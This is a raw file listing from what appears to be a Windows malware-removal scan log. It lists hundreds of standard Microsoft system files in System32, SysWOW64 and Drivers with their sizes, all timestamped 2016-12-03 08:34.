2016-12-03 08:34 - 2016-12-03 08:34 - 00028432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WppRecorder.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00028376 _____ (Microsoft Corporation) C:\WINDOWS\system32\CameraSettingsUIHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscisvif.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\secur32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnrpauto.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\more.com
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\encapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\delegatorprovider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\calc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027960 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptbase.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fs_rec.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00027864 _____ (Microsoft Corporation) C:\WINDOWS\system32\version.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\winusb.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WINSRPC.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\icmui.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEject.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\davhlpr.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidtel.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027352 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintDialogHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VaultCmd.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi_passthru.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdown.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\osbaseln.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncuprov.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\nativemap.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmutil.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\DefaultPrinterProvider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026896 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdcom.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winhv.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ C:\WINDOWS\system32\GamePanelExternalHook.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\vdsldr.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerCookies.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysntfy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SetNetworkLocation.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdiagnhost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\netbtugc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\gptext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscTimer.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vwifibus.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\ARP.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdbinst.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfnet.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\NcdProp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\NcaApi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\midimap.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndistapi.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksthunk.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\diskperf.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\chkwudrv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\bitsperf.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025872 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_02_19a2.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025872 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_02_10df.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\irmon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\CSystemEventsBrokerClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\comp.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\chkdsk.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\AJRouter.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hwpolicy.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00025360 _____ (Microsoft Corporation) C:\WINDOWS\system32\DDACLSys.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsrole.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\sort.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\serwvdrv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\FileAppxStreamingDataSource.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\fc.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\credssp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024752 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsRemoveDevice.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\xmlprovi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshcon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedcli.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ROUTE.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Register-CimProvider.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ktmw32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\easconsent.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbnmpntw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\cofire.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\capisp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAMRNBSink.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Feedback.Analog.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Custom.ps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\regsvr32.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\PaymentMediatorServiceProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mgmtapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\fltLib.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhsvcctl.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\adhapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024006 _____ C:\WINDOWS\system32\gb2312.uce
2016-12-03 08:34 - 2016-12-03 08:34 - 00023824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cmimcext.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.RemoteDesktop.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\WallpaperHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsDeviceAccessRevocation.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbservicetrigger.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\IpNatHlpClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mcd.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00023312 _____ (Microsoft Corporation) C:\WINDOWS\system32\streamci.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshelper.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.SystemManagedAccount.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\uniplat.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ws2ifsl.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\acu.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022984 _____ C:\WINDOWS\system32\bopomofo.uce
2016-12-03 08:34 - 2016-12-03 08:34 - 00022800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tbs.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00022800 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022744 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcwum.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winnsi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\replace.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasctrs.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintDialogHost3D.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\PING.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\nbtstat.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtcVSp1res.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCCSPal.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usb8023.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00022232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022192 _____ (Microsoft Corporation) C:\WINDOWS\system32\msg711.acm
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft) C:\WINDOWS\system32\grb.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\shpafact.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdial.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiltcfg.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\MdmDiagnosticsTool.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\fixmapi.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdPHost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\convert.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\bridgeunattend.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00021776 _____ (Microsoft Corporation) C:\WINDOWS\system32\BOOTVID.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00021656 _____ C:\WINDOWS\system32\NetTrace.PLA.Diagnostics.xml
2016-12-03 08:34 - 2016-12-03 08:34 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Background.ps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoteWipeCSP.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\smclib.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmstplua.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\chkntfs.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\attrib.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00021160 _____ (Microsoft Corporation) C:\WINDOWS\system32\nsi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft) C:\WINDOWS\system32\pegi-pt.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft) C:\WINDOWS\system32\pegi.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\icmui.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshqos.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.StartLayoutPopulationEvents.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\userinitext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntlanui2.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\EsdSip.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\dscproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\NdisVirtualBus.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\defragproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_02_1137.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmsgapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\tree.com
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\runas.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\netevent.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\irclass.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\httpprxp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\bnmanager.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHostProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020208 _____ (Microsoft Corporation) C:\WINDOWS\system32\FsIso.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mscorier.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMmRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winnlsres.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiatrace.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\umdmxfrm.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\TieringEngineProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Startupscan.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\serialui.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\PATHPING.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\nrpsrv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mscorier.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mpnotify.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\httpprxc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontgroupsoverride.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMmRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmdkey.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidcertstorecheck.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00019632 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksuser.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsock32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshrm.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winshfhc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\syssetup.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\localui.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterpriseetw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\irenum.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\doskey.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00019072 _____ (Microsoft Corporation) C:\WINDOWS\system32\iumbase.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\VmApplicationHealthMonitorProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityRtapiPal.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\netbios.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\mountvol.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernelceip.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsunattend.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmpushproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_IS2022.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\hh.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\TRACERT.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\stdole2.tlb
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\RmClient.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasautou.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCShellCommonProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrle32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ktmutil.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\clb.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018192 _____ (Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017976 _____ (Microsoft Corporation) C:\WINDOWS\system32\IumSdk.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017935 _____ C:\WINDOWS\system32\EventViewer_EventDetails.xsl
2016-12-03 08:34 - 2016-12-03 08:34 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\wowreg32.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasadhlp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlmsprep.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\find.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CortanaMapiHelper.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017806 ____R C:\WINDOWS\system32\CaptureToast.hcp
2016-12-03 08:34 - 2016-12-03 08:34 - 00017680 _____ (Microsoft Corporation) C:\WINDOWS\system32\WlS0WndH.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdstub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscproxystub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\whhelper.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsbyuv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\secinit.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityCommonPal.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\print.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRINFO.EXE
